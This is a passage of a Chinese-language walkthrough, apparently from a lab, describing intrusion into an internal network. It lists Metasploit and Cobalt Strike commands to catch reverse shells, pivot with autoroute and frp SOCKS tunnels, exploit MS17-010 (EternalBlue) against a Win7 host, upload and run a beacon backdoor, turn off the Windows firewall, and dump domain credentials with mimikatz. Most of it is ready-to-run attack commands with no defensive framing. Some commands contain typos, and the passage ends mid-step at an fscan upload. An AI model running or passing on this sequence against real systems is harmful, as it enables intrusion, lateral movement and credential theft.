Host指向开启MSF的服务器，

MSF上面执行下面命令，

use exploit/multi/handler//使用监听模块

set payload
windows/meterpreter/reverse_http//这个payload要跟CS设置的payload保持一致为http协议

set lhost 0.0.0.0//不设置也行，

set lport 8888//端口需要与cs监听器端口保持一致，因为cs的后门是反弹的8888端口。

然后运行

run

然后在CS上执行Spawn，

选择刚才添加的派生会话给MSF的监听器。

然后可以看到msf收到了shell，

执行命令出现乱码，对编码格式进行修改

chcp65001

MSF的session中输入shell获取目标主机的远程命令行shell，使用exit退出当前的shell。

如果想要退回到控制台界面，

background：把meterpreter后台挂起。

我们这里退回到meterpreter的位置，首先添加路由

run get_local_subnets
run autoroute -s 10.10.20.0/24
run autoroute -p

然后使用MSF上的ms17-010工具扫描一下。

将会话挂起，退到控制台界面

background

search ms17-010
use 3
set rhost 10.10.20.7
run

10.10.20.7机器存在ms17-010

现在可以利用
exploit/windows/smb/ms17_010_eternalblue 进行攻击, 拿下该机器

search ms17-010
use 0
set payload windows/x64/meterpreter/bind_tcp
set lport 11111
set rhosts 10.10.20.7
show options

然后执行

run

我这里第一次攻击失败了，win7蓝屏了，重新尝试，成功。

输入shell进入终端

查看ip

通过ms17-010拿下win7

方法二：建立SOCKS隧道上线MSF

这里简略描述一下思路

首先在被控机器（weblogc服务所在机器）上传frp，建立SOCKS5隧道

然后使用MSF

msfconsole
setg Proxies socks5:192.168.254.xxx:xxxx     //kali代理的ip和端口
setg ReverseAllowProxy true
use exploit/windows/smb/ms17-010-eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.10.20.7
run

方法一：win7执行payload上线CS

CS设置中转监听器

然后生成后门，选择刚才新建的监听器

把后门传到kali，然后在msf中使用命令上传到靶机win7上

upload beacon.exe

然后进入shell并执行

shell
beacon.exe

这里要注意，weblogic服务所在机器并没有关闭防火墙

netsh firewall show config

查看防火墙状态

netsh adfirewall set allprofiles state off 

关闭防火墙

然后就可以上线了

方法二：MSF派生会话到CS

这里CS要准备一个监听器，上面新建的一个中转监听

MSf载入注入模块

首先看一下session的id

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lport 5678
set lhost 10.10.20.12
set session 3

域内服务器Mssql

我们先回到msf上面，加载mimikatz，抓取一下密码

load mimikatz
creds_all

这里除了域用户的账号密码，还看到了域控的，继续尝试其他方式

查看网段发现新的网段，继续添加路由

run get_local_subnets
run autorouts -s 10.10.10.0/24
run autorouts -p

这个时候我们已经通过MS17-010 -> mimikatz拿到了一个域用户的账号密码，尝试查找约束委派用户

上传一个fscan上去